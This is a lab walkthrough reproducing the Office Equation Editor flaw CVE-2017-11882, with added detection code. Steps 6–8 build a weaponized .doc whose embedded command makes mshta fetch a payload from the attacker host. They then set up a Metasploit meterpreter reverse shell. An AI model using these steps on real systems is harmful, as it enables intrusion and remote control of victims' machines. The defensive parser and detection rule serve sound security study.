Office Remote Code Execution Vulnerability (CVE-2017-11882) Vulnerability Reappears
- 1. Vulnerability principle
- 2. View the exploit file on the Kali platform
- 3. Log in to the target machine and open the FTP server
- 4. Log in to Kali and use the FTP server to upload the payload-cale.doc file
- 5. Log in to the target machine, trigger the doc file, and verify that the vulnerability exists
- 6. Log in to the Kali platform, execute the command, and generate a doc document containing the attack code
- 7. Start and configure Metasploit on the Kali platform
- 8. Double-click the payloadattack.doc document on the target platform to trigger the vulnerability
1. Vulnerability principle
CVE-2017-11882, the "Microsoft Office Memory Corruption Vulnerability", is a remote code execution vulnerability caused by a stack buffer overflow: because Office fails to properly handle objects in memory, an attacker can run arbitrary code in the context of the current user.
The flaw lies in the Equation Editor component, EQNEDT32.EXE. It can be triggered simply by a victim opening a crafted Office document, which is what makes it so dangerous. The root cause is in how EQNEDT32.EXE reads OLE data that contains a MathType equation: the function that handles the Font Name data allocates a 0x24-byte stack buffer for it, but copies the formula's Font Name without checking its length. A font name longer than the buffer therefore overflows the stack, and that missing length check is the vulnerability.
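To make the missing bound concrete, here is an added example (not code from the original article or from Equation Editor) that walks MTEF FONT records and flags any font name that would not fit in the 0x24-byte buffer the text describes. The record layout it assumes comes from public analyses of this CVE, not from this page: a 5-byte MTEF header, then records, where a FONT record is the tag byte 0x08, a typeface byte, a style byte and a NUL-terminated name. The sample streams are constructed for the example.

```python
# Added example: a length check on MTEF FONT records, i.e. the bound that the
# vulnerable EQNEDT32.EXE copy loop omits. Layout assumptions (not from the page):
#   header = 5 bytes; FONT record = tag 0x08, typeface byte, style byte, name, 0x00.
FONT_NAME_BUFFER = 0x24   # size of the stack buffer named in the text (36 bytes)
FONT_TAG = 0x08
END_TAG = 0x00
MTEF_HEADER_LEN = 5


def font_name_lengths(mtef: bytes):
    """Return (record_offset, name_length) for each FONT record after the header.

    Only FONT records are modelled; the walk stops at the END tag or at any
    other record kind, whose length this example does not know.
    """
    found = []
    i = MTEF_HEADER_LEN
    while i < len(mtef):
        tag = mtef[i]
        if tag != FONT_TAG:          # END_TAG or an unmodelled record kind
            break
        name_start = i + 3           # skip tag, typeface and style bytes
        end = mtef.find(b"\x00", name_start)
        if end == -1:                # unterminated name: runs to end of stream
            end = len(mtef)
        found.append((i, end - name_start))
        i = end + 1                  # continue after the terminator
    return found


def oversized_font_records(mtef: bytes, limit: int = FONT_NAME_BUFFER):
    """Records whose name plus its terminator cannot fit in a `limit`-byte buffer.

    A bounded copy would reject or truncate these; the vulnerable code copies
    them anyway, which is the overflow.
    """
    return [(off, n) for off, n in font_name_lengths(mtef) if n + 1 > limit]


# Constructed sample data (assumed MTEF v3 header bytes).
MTEF_HEADER = bytes([0x03, 0x01, 0x01, 0x03, 0x0A])


def font_record(name: bytes, tface: int = 0x5A, style: int = 0x5A) -> bytes:
    """Build one FONT record under the layout assumed above."""
    return bytes([FONT_TAG, tface, style]) + name + b"\x00"


SAMPLE_OK = MTEF_HEADER + font_record(b"Times New Roman") + bytes([END_TAG])
SAMPLE_BAD = MTEF_HEADER + font_record(b"A" * 40) + bytes([END_TAG])

if __name__ == "__main__":
    for label, stream in (("ok", SAMPLE_OK), ("bad", SAMPLE_BAD)):
        print(label, oversized_font_records(stream))
```

The check is deliberately the one a fixed parser needs: the name and its terminator must fit in the buffer, so a 35-byte name passes and a 36-byte name is rejected. Anything this function flags in an "Equation Native" stream is worth a closer look, but a clean result is not proof of a benign file, since other record kinds are not parsed here.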
Affected Office versions (when not updated):
- Microsoft Office 2000
- Microsoft Office 2003
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2016
- Microsoft Office 365
Vulnerability environment:
Attack machine: Kali (10.10.0.11)
Tool: Metasploit
Target machine: Windows 2008 (10.10.0.9)
Tools: Office software, FTP server
2. View the exploit file on the Kali platform
The payload document (a .doc file) prepared for the attack:
This file is generated with the CVE-2017-11882.py attack script from GitHub:
python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc
Opening this document shows the Office text and, at the same time, pops up the Calculator program. This experiment uses the document to verify whether the target machine is affected by the Office remote code execution vulnerability (CVE-2017-11882).
3. Log in to the target machine and open the FTP server
Open the FTP server. Click the green button on the far left to start the FTP service:
The following change can be seen: the FTP server starts and "FTP service online" is displayed. The FTP root directory is the desktop of the target machine.
4. Log in to Kali and use the FTP server to upload the payload-cale.doc file
Switch to the root account in the Kali terminal, then use the ftp tool to connect to the target machine's service:
After logging in to ftp successfully, upload the payload-cale.doc file to the Windows 2008 target machine with the command:
put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc
5. Log in to the target machine, trigger the doc file, and verify that the vulnerability exists
6. Log in to the Kali platform, execute the command, and generate a doc document containing the attack code
python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc
Upload the file to the target machine with the FTP service:
7. Start and configure Metasploit on the Kali platform
Start it:
msfconsole
Find the CVE-2017-11882 vulnerability:
search CVE-2017-11882
Load the attack exploit program, set the payload and various parameters:
use exploit/windows/smb/CVE-2017-11882
Set the payload to a reverse TCP shell:
set payload windows/meterpreter/reverse_tcp
Set the local machine address:
set lhost 10.10.0.11
Set the path of the uri:
set URIPATH payload
After the payload is set and the exploit is started, msf listens on port 8080 of the local machine; when the target machine requests 10.10.0.11:8080/payload, the link is opened and the reverse TCP session connects back to port 4444.
Launch the exploit:
exploit -j
8. Double-click the payloadattack.doc document on the target platform to trigger the vulnerability
On the desktop of the target machine you can see the file uploaded via ftp in the previous step; double-clicking it opens the document and the session is established.
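The chain in steps 6 to 8 leaves a very recognisable trace on the endpoint: Equation Editor is started out of process (by the DCOM launcher, so its parent is svchost.exe rather than WINWORD.EXE), and it is EQNEDT32.EXE that then spawns the command from the document, here mshta.exe fetching http://10.10.0.11:8080/payload or calc.exe in the test document. The following added example (not part of the original article) runs that detection logic over constructed Sysmon-style process-creation events; the event field names and the sample paths are assumptions for the example.

```python
# Added example: detection for the CVE-2017-11882 chain described in the article,
# run over constructed process-creation events. Field names are assumed.
import re

EQUATION_EDITOR = "eqnedt32.exe"
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events in execution order (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" C:\Users\bob\Desktop\payloadattack.doc'},
    # Equation Editor is launched via DCOM, so its parent is svchost.exe, not Word.
    {"image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'"EQNEDT32.EXE" -Embedding'},
    # The command embedded in the document runs as a child of EQNEDT32.EXE.
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "mshta http://10.10.0.11:8080/payload"},
    {"image": r"C:\Windows\System32\calc.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "calc.exe"},
    # Benign: mshta running a local file from the shell.
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta C:\Users\bob\local.hta"},
    # Suspicious even without Equation Editor: mshta pulling a remote payload.
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta http://10.10.0.11:8080/payload"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, child_image, cmdline) for every event that matches a rule.

    Rule 1: any child process of EQNEDT32.EXE. Equation Editor has no legitimate
            reason to start other programs, so this fires on the exploit itself,
            whatever command the document carries.
    Rule 2: mshta.exe whose command line contains a URL, i.e. a remote HTA being
            fetched, which is the stage-2 step used in this article.
    """
    alerts = []
    for ev in events:
        parent = basename(ev["parent_image"])
        child = basename(ev["image"])
        if parent == EQUATION_EDITOR:
            alerts.append(("eqnedt32_child_process", child, ev["cmdline"]))
            continue
        if child == "mshta.exe" and REMOTE_URL.search(ev["cmdline"]):
            alerts.append(("mshta_remote_payload", child, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for rule, child, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {child}: {cmdline}")
```

Keying on EQNEDT32.EXE as the parent, rather than on WINWORD.EXE, matters because of the DCOM launch: a rule that only looks for Office spawning mshta.exe or cmd.exe misses this chain entirely. The same parent-process rule also covers the calc.exe test document from step 2, since it does not depend on which command the document carries.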